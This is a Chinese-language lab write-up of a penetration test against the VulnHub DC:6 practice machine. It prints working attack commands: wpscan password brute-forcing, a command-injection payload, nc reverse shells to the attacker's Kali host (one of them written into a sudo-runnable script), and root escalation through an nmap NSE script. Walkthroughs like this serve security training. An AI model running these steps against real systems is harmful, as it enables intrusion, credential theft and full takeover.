vulnhub-DC:6靶机渗透记录
准备工作
在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub
导入到vmware,设置成NAT模式
打开kali准备进行渗透(ip:192.168.200.6)
信息收集
利用nmap进行ip端口探测
nmap -sS 192.168.200.6/24
探测到ip为192.168.200.17的靶机,开放了80端口和22端口
再用nmap对所有端口进行探测,确保没有别的遗漏信息
nmap -sV -p- 192.168.200.17
先看看80端口,一直打不开,重定向到了wordy,像DC:2的方法一样操作,修改host文件
vi /etc/hosts
和dc:2的界面一模一样框架也是 WordPress
dirsearch扫描也扫到了/wp-login.php后台登陆页面
接下来和dc:2的操作基本一致
wpscan扫描
使用kali自带的工具wpscan(wordpress框架专门的漏洞扫描工具)列举出所有用户
wpscan --url http://wordy/ -e u
爆出五个用户 admin、jens、graham、mark、sarah,保存下来待会进行爆破
但是用了很多字典都爆破不出来,不知道怎么办的时候才发现在下载地址处的最下面给了线索DC: 6 ~ VulnHub
先cd到/usr/share/wordlists/这个目录,因为rockyou这个文件没有解压不能直接打开
gunzip rockyou.txt.gz
再返回桌面执行作者给的命令
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
直接使用wordy进行爆破
wpscan --url http://wordy/ -U user -P passwords.txt
爆到用户名mark 密码helpdesk01
nc反弹shell
登陆到刚刚的后台页面,在这里找到了命令执行的地方,试了一下127.0.0.1|ls 发现有漏洞可以执行任意命令,那就可以反弹shell到kali上
使用nc反弹shell,但是那个框有字数限制,用bp抓一下再放出去就解决了
nc -e /bin/bash 192.168.200.6 9999
再使用python 通过pty.spawn()获得交互式shell
python -c'import pty;pty.spawn("/bin/bash")'
root没有权限进不去,但是在home里发现了四个用户,在mark用户发现了一个txt文件,里面有graham的密码 GSo7isUM1D4
使用su切换成graham,看看graham的权限
发现jens下的backups.sh可以不用密码执行,可以用来获取jens的权限
这里有两种方法第一种是写入/bin/bash/,然后以jens的用户来执行文件直接获取权限
这里我记录第二种方法,写入nc命令,然后在另一端监听nc -lvf 9999,最后在以jens用户执行sh文件,再使用python 通过pty.spawn()获得交互式shell,两种方法思路都差不多
echo 'nc 192.168.200.6 9999 -e /bin/bash' > backups.sh
sudo -u jens /home/jens/backups.sh
python -c'import pty;pty.spawn("/bin/bash")'
在看看jens的权限sudo -l
发现root权限namp无需密码,利用这个文件提权
权限提升
namp有执行脚本的功能,那就可以写一个执行bash的脚本文件,通过namp执行来提权
echo 'os.execute("/bin/sh")' > getroot.nse //nes脚本后缀
sudo nmap --script=/home/jens/getroot.nse //namp执行
DONE
参考文章